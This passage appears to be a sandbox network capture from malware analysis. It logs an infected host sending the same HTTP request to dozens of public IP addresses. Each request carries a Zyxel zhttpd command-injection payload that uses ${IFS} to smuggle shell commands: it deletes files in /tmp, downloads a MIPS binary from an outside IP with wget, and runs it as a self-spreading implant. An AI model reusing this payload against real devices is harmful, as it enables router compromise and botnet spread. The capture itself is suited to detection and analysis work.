                                        Mar 31, 2024 09:20:58.596810102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3126192.168.2.2358434211.177.233.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596853971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3127192.168.2.235010871.210.84.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596895933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3128192.168.2.234354461.87.23.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596950054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3129192.168.2.2345854184.5.147.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597009897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3130192.168.2.2353336122.28.172.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597043037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3131192.168.2.236085232.229.10.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597084999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3132192.168.2.23445722.74.23.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597134113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3133192.168.2.234849898.72.88.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597162962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3134192.168.2.235138483.26.163.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597214937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3135192.168.2.2341280212.205.219.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597270966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3136192.168.2.2337796132.223.77.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597311020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3137192.168.2.2337280161.230.114.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597371101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3138192.168.2.235654689.114.100.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597414017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3139192.168.2.2358796223.53.38.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597489119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3140192.168.2.2346816183.146.181.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597521067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3141192.168.2.235713097.64.118.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597569942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3142192.168.2.2352092133.68.80.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597595930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3143192.168.2.2346566126.23.212.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597646952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3144192.168.2.2341206143.26.45.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597686052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3145192.168.2.2337510196.91.10.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597744942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3146192.168.2.234869485.156.231.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597800970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3147192.168.2.234686674.114.231.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597842932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3148192.168.2.2357958186.152.16.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597892046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3149192.168.2.23448388.39.215.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597943068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3150192.168.2.2352032116.69.39.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.597997904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3151192.168.2.235879090.47.135.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598035097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3152192.168.2.2356414196.38.32.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598079920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3153192.168.2.234264283.90.38.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598135948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3154192.168.2.2359232167.250.160.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598170996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3155192.168.2.2355260158.103.218.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598222017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3156192.168.2.2336692129.47.185.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598284006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3157192.168.2.233370444.165.191.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598340034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3158192.168.2.2342950207.30.114.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598386049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3159192.168.2.2343140174.41.78.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598437071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3160192.168.2.233893614.4.143.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598473072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3161192.168.2.2353392193.231.142.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598520041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3162192.168.2.233980697.251.233.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598576069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3163192.168.2.2348102100.16.77.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598613024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3164192.168.2.2337326222.118.155.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598659039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3165192.168.2.234098890.119.22.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598705053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3166192.168.2.234459878.28.98.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598756075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3167192.168.2.2336434126.250.127.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598805904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3168192.168.2.234145660.110.134.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598862886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3169192.168.2.234797693.220.128.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598907948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3170192.168.2.2354656164.219.62.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598963976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3171192.168.2.2339336177.159.126.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.598993063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3172192.168.2.234376280.131.52.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599042892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3173192.168.2.2339624197.22.20.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599085093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3174192.168.2.2351730182.143.160.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599136114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3175192.168.2.2336904191.166.201.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599186897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3176192.168.2.234476017.214.77.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599232912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3177192.168.2.2339236197.64.44.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.599275112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3178192.168.2.2345520161.63.24.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:59.606324911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3179192.168.2.234145073.50.95.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:59.606451035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3180192.168.2.234785879.246.250.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:59.606498003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3181192.168.2.2346842210.68.162.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:59.606528044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3182192.168.2.2354596206.129.107.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.609924078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3183192.168.2.2333786157.221.188.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.609972954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3184192.168.2.2352622201.39.101.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.610153913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3185192.168.2.2339674192.38.36.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.610219002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3186192.168.2.234175089.24.189.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.610276937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3187192.168.2.2332826178.22.52.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:00.610352039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3188192.168.2.234146881.86.194.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:01.614403009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3189192.168.2.2333758179.74.241.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:01.614460945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3190192.168.2.234384899.33.233.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618308067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3191192.168.2.234923075.40.171.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618355989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3192192.168.2.2341962161.57.137.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:02.618424892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3193192.168.2.23415624.116.189.162443
                                        TimestampBytes transferredDirectionData
